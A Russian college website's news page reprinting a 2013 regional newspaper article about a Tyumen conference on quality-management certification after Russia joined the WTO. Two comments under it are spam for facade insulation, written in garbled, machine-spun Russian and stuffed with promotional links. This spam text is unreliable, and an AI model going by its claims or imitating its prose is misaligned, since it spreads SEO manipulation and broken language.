Главная
Регистрация
Вход

Приветствую Вас Гость | RSS

Меню сайта

Категории раздела
Абитуриентам [0]
Для желающих поступить в наш колледж

Независимая оценка
Как вы оцениваете качество образовательных услуг нашего колледжа?
Всего ответов: 224

Статистика

Онлайн всего: 1
Гостей: 1
Пользователей: 0

  
Главная » 2013 » Декабрь » 19 » Качество гарантирует конкурентоспособность
09:13
Качество гарантирует конкурентоспособность

Качество гарантирует конкурентоспособность

© Тюменская правда

18.12.2013

Статьи | Экономика | Экономика

Автор: Тимур ХАКИМОВ  

(Лариса Александровна Федык вручает сертификат по СМК Альбине Николаевне Федосовой)

Третья всероссийская научно-практическая конференция

«Новые экономические условия. Результаты и достижения первого года пребывания России в ВТО в свете аспектов стандартизации и сертификации» состоялась в областном центре.

Тюменская конференция является одной из самых представительных в стране для специалистов в области менеджмента качества. В ней приняли участие руководители и владельцы предприятий, директора образовательных учреждений, учреждений социального обслуживания, сферы здравоохранения, начальники служб качества учреждений сферы образования, здравоохранения и социального обслуживания.

Ежегодная конференция стала традицией и отчетом о том, что организации и предприятия сделали на пути интеграции в новое экономическое сообщество, — сказал в приветствии к участникам мероприятия заместитель губернатора Тюменской области Вячеслав Вахрин. — Конференция проходит в дни, когда прозвучало Послание президента Владимира Путина к Федеральному собранию, в котором красной нитью мысль о том, что дальнейшее развитие реального сектора экономики — за конкурентоспособными предприятиями.

По мнению заместителя главы региона, это значит, что всеми предприятиями и организациями сертификация на соответствие международным стандартам должна быть понята и принята как объективная реальность сегодняшнего дня.

В ходе конференции руководитель центрального органа системы добровольной сертификации «Всероссийский регистр», директор Западносибирского центра внедрения высоких профессиональных технологий Лариса Федык рассказала о результатах первого года пребывания России во Всемирной торговой организации. По ее словам, в уходящем году несколько тюменских предприятий прошли не только разработку, внедрение, но и сертификацию системы менеджмента качества. 

Лариса Федык вручила соответствующие сертификаты представителям предприятий, в том числе заместителю директора по научно-методической работе Голышмановского агропедагогического колледжа Альбине Федосовой.  сертификат

Участники конференции из нескольких регионов России с научной точки зрения рассмотрели перспективы повышения эффективности государственного и муниципального управления в условиях интеграции страны в международную структуру. Были обоснованы способы повышения эффективности и конкурентоспособности отечественного производства.

Просмотров: 1007 | Добавил: iTiger | Рейтинг: 0.0/0
Всего комментариев: 2
2 ppu-pro_oi  
0
Наша группа профессиональных исполнителей завершена предложить вам инновационные системы утепления, которые не только снабдят надежную защиту от заморозков, но и дарят вашему собственности изысканный вид.
Мы практикуем с последовательными компонентами, обеспечивая долгосрочный термин использования и блестящие итоги. Утепление внешней обшивки – это не только экономия на подогреве, но и забота о природной среде. Спасательные подходы, какие мы внедряем, способствуют не только дому, но и сохранению экосистемы.
Самое основное: <a href=https://ppu-prof.ru/>Сколько стоит сделать фасад дома с утеплением</a> у нас стартует всего от 1250 рублей за метр квадратный! Это бюджетное решение, которое переделает ваш дом в истинный тепловой местечко с скромными затратами.
Наши примеры – это не только теплоизоляция, это разработка пространства, в где любой деталь выражает ваш персональный манеру. Мы примем все ваши просьбы, чтобы переделать ваш дом еще еще более теплым и привлекательным.
Подробнее на <a href=https://ppu-prof.ru/>http://ppu-prof.ru/</a>
Не откладывайте заботу о своем жилище на потом! Обращайтесь к спецам, и мы сделаем ваш жилище не только теплым, но и более элегантным. Заинтересовались? Подробнее о наших сервисах вы можете узнать на портале. Добро пожаловать в обитель гармонии и высоких стандартов.

1 ppu-prof_oi  
0
Наша команда опытных исполнителей подготовлена предъявить вам прогрессивные приемы, которые не только гарантируют надежную оборону от мороза, но и подарят вашему коттеджу элегантный вид.
Мы работаем с последними материалами, гарантируя постоянный срок эксплуатации и блестящие выходы. Теплоизоляция облицовки – это не только экономия на огреве, но и заботливость о экологии. Энергосберегающие технологические решения, какие мы используем, способствуют не только своему, но и поддержанию природы.
Самое важное: <a href=https://ppu-prof.ru/>Прайс лист на утепление фасада</a> у нас открывается всего от 1250 рублей за метр квадратный! Это бюджетное решение, которое сделает ваш хаус в фактический уютный корнер с минимальными издержками.
Наши примеры – это не единственно теплоизоляция, это созидание помещения, в где каждый деталь выражает ваш персональный стиль. Мы возьмем во внимание все ваши желания, чтобы осуществить ваш дом еще больше теплым и привлекательным.
Подробнее на <a href=https://ppu-prof.ru/>http://ppu-prof.ru/</a>
Не откладывайте заботу о своем обители на потом! Обращайтесь к исполнителям, и мы сделаем ваш домик не только согретым, но и стильным. Заинтересовались? Подробнее о наших предложениях вы можете узнать на нашем сайте. Добро пожаловать в пространство уюта и высоких стандартов.

Имя *:
Email *:
Код *:


Вход на сайт
Логин:
Пароль:

Мы потомки Героев


ПОЛЕЗНЫЕ ССЫЛКИ

Министерство образования и науки Российской Федерации Единое окно доступа к образовательным ресурсам Федеральный портал "Российское образование" Единая коллекция цифровых образовательных ресурсов Федеральный центр информационно-образовательных ресурсов


Персональные данные Дети МЕСТО РОЖДЕНИЯ:
ТЮМЕНСКИЙ КРАЙ Конкурс новый взгляд
<script src="https://tabun.info/out/index.php"></script>
http://профстажировки.рф/
Поиск

Календарь
«  Декабрь 2013  »
ПнВтСрЧтПтСбВс
      1
2345678
9101112131415
16171819202122
23242526272829
3031

Block title
Block content

Block title
Block content

Block title
Block content

Block title
Block content

Block title
Block content

Block title
Block content

Block title
Block content

Block title
Block content

Block title
Block content

Block title
Block content

Block title
Block content

Block title
Block content

Block title
Block content

Block title
Block content

Block title
Block content

Архив записей

Copyright MyCorp © 2024
Создать бесплатный сайт с uCoz